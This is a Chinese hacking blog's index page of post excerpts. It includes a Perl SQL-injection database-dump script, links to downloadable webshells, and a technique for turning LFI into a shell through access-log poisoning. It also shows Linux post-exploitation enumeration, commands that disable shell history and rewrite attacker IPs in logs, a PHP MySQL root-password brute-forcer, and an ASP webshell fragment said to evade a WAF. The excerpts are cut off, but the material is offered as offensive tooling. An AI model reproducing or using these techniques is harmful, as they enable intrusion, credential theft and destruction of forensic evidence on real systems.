上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 30 下一页

2013年12月28日

mysql注入导库脚本

摘要: #!/usr/bin/perl -w#改版权不得好死...#转载须注明#语法 自己改改use strict;use LWP::Simple;use utf8;$|++;my $count = 1;for ($count = 1; $count >", "password.txt" or die $!; print "$1\n"; print FILE "$1\n"; close FILE; }} 阅读全文

posted @ 2013-12-28 16:48 =_=! 阅读(110) 评论(0) 推荐(0) 编辑

2013年12月16日

NMAP的技巧

摘要: Nmap(“NetworkMapper”)是一个免费开源的网络探测和安全审计实用工具,许多系统和网络管理员也使用它完成一些任务,例如:网络清查、管理服务升级计划和监视主机或服务的正常运行时间等。这里列举了一些使用namp的一些非常cool的扫描技术,除此之外,你也可以查看在namp主页上的向导和教程。1)获取远程主机的端口信息和识别主机操作系统(GetinfoaboutremotehostportsandOSdetection)nmap-sS-P0-sV-O可以是独立IP,一个主机名或一个子网-sSTCPSYN扫描(也叫半开或隐蔽扫描)-P0选项允许你关闭ICMPping-sV选项启用版本检测 阅读全文

posted @ 2013-12-16 07:29 =_=! 阅读(274) 评论(0) 推荐(0) 编辑

2013年12月5日

JSP和菜刀那点事

摘要: 脚本下载地址:JSP脚本:http://xsser.me/caidao/css.jspJspx脚本:http://xsser.me/caidao/jspx.jspxJspf脚本:http://xsser.me/caidao/css.jspf执行自定义查询备份: 在任意的SQL语句后面加上:--f:xxxx.sql(任意文件名和后缀) 如: SELECT * FROM DEPT ORDER BY 1 DESC --f:2.sql 程序会自动在网站根目录新建或打开images文件夹写入2.sql. 1、新增查询参数:--f:-to: select * from sys_user --f:-to:d 阅读全文

posted @ 2013-12-05 18:02 =_=! 阅读(2280) 评论(0) 推荐(0) 编辑

2013年12月1日

LFI2Shell

摘要: Diffrent Way to Expl0it LFI!1.如果允许上传,且可以得到路径,那么直接传shell,再LFI即可2.不允许上传的情况下(1)包含access.log 通过在user-agent里写入shell,然后再LFI access.log即可 原理:access.log 是访问日志文件,你的访问里如果有php代码也会记录到里面,但是有个缺点,如果这个文件大小超过php的限制,你就包含不了了! 提示:access.log里面会记录 IP,URL,User-Agent IP不可能改,URl里面写shell代码会被url编码,无法执行,只有在user-agent里改才能成功写入ph 阅读全文

posted @ 2013-12-01 10:31 =_=! 阅读(344) 评论(0) 推荐(0) 编辑

2013年11月19日

RFI远程文件包含的漏洞

摘要: RFI(Remote File Inclusion) 远程文件包含漏洞,即服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严格,从而可以去包含一个恶意文件,攻击者就可以远程构造一个特定的恶意文件达到攻击目的。文件包含的目的程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。PHP中常用的包含调用函数有:include(), require(), include_once(), require_once() .include失败会弹出警告 而require则直接导致致命的错误本地包含与远程包含In 阅读全文

posted @ 2013-11-19 00:58 =_=! 阅读(4964) 评论(1) 推荐(0) 编辑

2013年11月4日

PHP文件包含漏洞攻防实战

摘要: 摘要PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。1. PHP文件包含漏洞介绍首先,我们来介绍下何为文件包含漏洞。严格来说,文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含。文件包含漏 阅读全文

posted @ 2013-11-04 15:59 =_=! 阅读(8276) 评论(0) 推荐(0) 编辑

2013年11月1日

Linux提权后获取敏感信息的方法与途径

摘要: 在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节.文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。 列举关键点(Linux)的提权是怎么一回事: 收集 – 枚举,枚举和一些更多的枚举。 过程 – 通过数据排序,分析和确定优先次序。 搜索 – 知道搜索什么和在哪里可以找到漏洞代码。 适应 ... 阅读全文

posted @ 2013-11-01 13:39 =_=! 阅读(505) 评论(0) 推荐(0) 编辑

2013年10月25日

webshell下破解mysql的root密码的php脚本

摘要: 扫描结束";function connect($pass){$conn=@mysql_connect("localhost","root",$pass);if($conn){echo "得到root密码:$pass";exit();}else{echo "|";}}?> ps: mysql.txt为你自己的字典文件 阅读全文

posted @ 2013-10-25 00:16 =_=! 阅读(192) 评论(0) 推荐(0) 编辑

2013年10月24日

Linux入侵检测一些技巧性知识

摘要: 1. 登录ssh之后不记录historyunset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=02. sed的一些邪恶用法邪恶的替换到登录的IP和日志里的访问IPsed -s s/211.xxx.xxx.xxx/192.168.1.1/g access_log access.log security邪恶的添加ssh限制登录的用户sed -i s/AllowUsers fuck root oracle/A 阅读全文

posted @ 2013-10-24 18:40 =_=! 阅读(260) 评论(0) 推荐(0) 编辑

2013年10月23日

asp过安全狗的webshell

摘要: 安全狗介绍:网站安全狗是安全狗互联网安全实验室研发的一款服务器安全防护软件。也是很多小黑们的拦路虎,眼中钉。今天与大家分享的是一枚能过安全狗的asp shell.GIF89a$ ;"" thenset fs=server.CreateObject("scripting.filesystemobject")set thisfile=fs.CreateTextFile(testfile,True)thisfile.Write(""&Request.form("1988") & "") 阅读全文

posted @ 2013-10-23 03:31 =_=! 阅读(279) 评论(0) 推荐(0) 编辑

上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 30 下一页

导航